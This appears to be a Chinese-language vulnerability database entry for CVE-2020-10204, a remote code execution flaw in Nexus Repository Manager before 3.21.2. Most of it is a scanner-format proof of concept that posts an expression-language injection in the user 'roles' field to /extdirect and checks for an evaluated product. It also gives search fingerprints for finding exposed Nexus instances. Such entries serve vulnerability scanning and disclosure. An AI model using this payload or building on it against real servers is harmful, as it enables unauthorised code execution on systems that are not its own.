CVE-2020-10204: Nexus Repository before 3.21.2 Remote Code Execution

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

漏洞触发需要任意账户权限 body="Nexus Repository Manager" app="Nexus-Repository-Manager"

PoC代码[已公开]

id: CVE-2020-10204

info:
  name: Nexus Repository before 3.21.2 Remote Code Execution
  author: kingkk
  severity: high
  verified: false
  description: |-
    漏洞触发需要任意账户权限
    body="Nexus Repository Manager"
    app="Nexus-Repository-Manager"
  tags: cve,cve2020,nexus,rce
  created: 2023/08/17

set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
rules:
  r0:
    request:
      method: POST
      path: /extdirect
      headers:
        Content-Type: application/json
      body: |
        {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28}
    expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0()